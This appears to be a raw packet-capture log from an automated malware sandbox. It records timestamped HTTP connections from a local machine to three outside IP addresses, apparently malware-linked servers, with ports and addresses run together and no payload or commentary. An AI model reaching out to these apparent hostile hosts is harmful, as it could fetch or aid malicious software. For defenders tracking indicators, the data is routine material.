                                                                          Sep 27, 2024 04:21:04.560893059 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.560911894 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.560956955 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.560982943 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.560995102 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.561006069 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.561017990 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.561037064 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.561068058 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.561681032 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.561731100 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.561753988 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.561767101 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.561777115 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.561804056 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.561805964 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.561819077 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.561824083 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.561831951 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.561860085 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.561897039 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.562375069 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.562444925 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.626734018 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.626851082 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.627032042 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.627091885 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.627180099 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.627191067 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.627233028 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.627262115 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.627334118 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.627347946 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.627357960 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.627370119 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.627379894 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.627435923 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.627435923 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.627499104 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.627511024 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.627521992 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.627533913 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.627547026 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.627552986 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.627557993 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.627577066 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.627593040 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.627593040 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.627620935 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.627624035 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.627660036 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.663208008 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.663220882 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.663230896 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.663243055 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.663264036 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.663290024 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.663513899 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.663527012 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.663537979 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.663548946 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.663559914 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.663559914 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.663573027 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.663594007 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.663619041 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.663641930 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.663655043 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.663671017 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.663678885 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.663705111 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.663805962 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.663851976 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.663885117 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.663896084 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.663906097 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.663918972 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.663930893 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.663938046 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.663954973 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.663966894 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.664026976 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.664038897 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.664072037 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.664155006 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.664166927 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.664179087 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.664190054 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.664215088 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.664230108 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.664271116 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.664283991 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.664294958 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.664305925 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.664319038 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.664339066 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.664343119 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.664355040 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.664380074 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.664401054 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.664504051 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.664515018 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.664526939 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.664550066 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.664568901 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.664659977 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.664671898 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.664684057 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.664705038 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.664730072 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.664817095 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.664830923 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.664870977 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.664935112 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.664947987 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.664958954 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.664963961 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.664972067 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.664979935 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.665004969 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.665026903 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.665081024 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.665092945 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.665107012 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.665117979 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.665144920 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.665256977 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.665268898 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.665282011 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.665304899 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.665316105 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.665321112 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.665339947 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.665352106 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.665363073 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.665364027 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.665391922 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.665430069 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.665476084 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.665591002 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.665602922 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.665613890 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.665626049 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.665632963 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.665659904 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.665826082 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.665838003 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.665868044 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.665891886 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.665945053 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.665961981 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.665975094 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.665986061 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.665990114 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.665998936 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666009903 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666019917 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.666021109 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666054010 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.666073084 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.666083097 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666095018 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666129112 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.666148901 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.666258097 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666270018 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666282892 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666301966 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.666335106 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.666425943 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666436911 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666448116 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666460037 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666491985 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.666511059 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666520119 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.666522980 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666536093 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666546106 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666562080 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.666598082 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.666688919 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666701078 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666712046 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666723967 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666734934 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666747093 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666758060 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666765928 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.666765928 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.666802883 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.666836977 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666850090 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666862011 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666891098 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.666918039 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.666974068 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666985989 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.666997910 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.667022943 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.667053938 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.667135954 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.667148113 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.667159081 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.667186022 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.667212963 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.667212963 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.667228937 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.667242050 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.667253017 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.667257071 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.667293072 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.667323112 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.668648005 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.668709993 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.668788910 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.668840885 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.714476109 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.714485884 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.714497089 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.714540958 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.714576960 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:05.364763975 CEST4971080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:05.365042925 CEST4971280192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:05.369904041 CEST8049712185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:05.370018959 CEST8049710185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:05.370090961 CEST4971080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:05.370172024 CEST4971280192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:05.370484114 CEST4971280192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:05.375220060 CEST8049712185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:06.072520018 CEST8049712185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:06.076575994 CEST4971280192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:06.079277992 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.084212065 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.084322929 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.084443092 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.089236975 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.704785109 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.704807043 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.704818964 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.704832077 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.704844952 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.704853058 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.704896927 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.704925060 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.704941988 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.704955101 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.704982042 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.704997063 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.705005884 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.705046892 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.705082893 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.705123901 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.705144882 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.705184937 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.709805012 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.709829092 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.709872007 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.709892988 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.709935904 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.709978104 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.795336962 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.795424938 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.795430899 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.795458078 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.795486927 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.795511007 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.795511007 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.795547009 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.795568943 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.795586109 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.795602083 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.795607090 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.795619965 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.795631886 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.795655966 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.795669079 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.796350956 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.796364069 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.796375990 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.796386957 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.796408892 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.796444893 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.796868086 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.796880007 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.796891928 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.796904087 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.796926022 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.796945095 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.797461987 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.797472954 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.797483921 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.797524929 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.797524929 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.797559023 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.797571898 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.797584057 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.797605038 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.797626972 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.797626972 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.798383951 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.798439026 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.800470114 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.800502062 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.800523043 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.800543070 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.800548077 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.800601006 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.885978937 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.885993958 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.886006117 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.886034012 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.886059999 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.886073112 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.886084080 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.886126041 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.886185884 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.886271000 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.886290073 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.886301994 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.886317968 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.886332989 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.886353970 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.886382103 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:06.886543989 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:06.886588097 CEST8049713194.116.215.195192.168.2.5
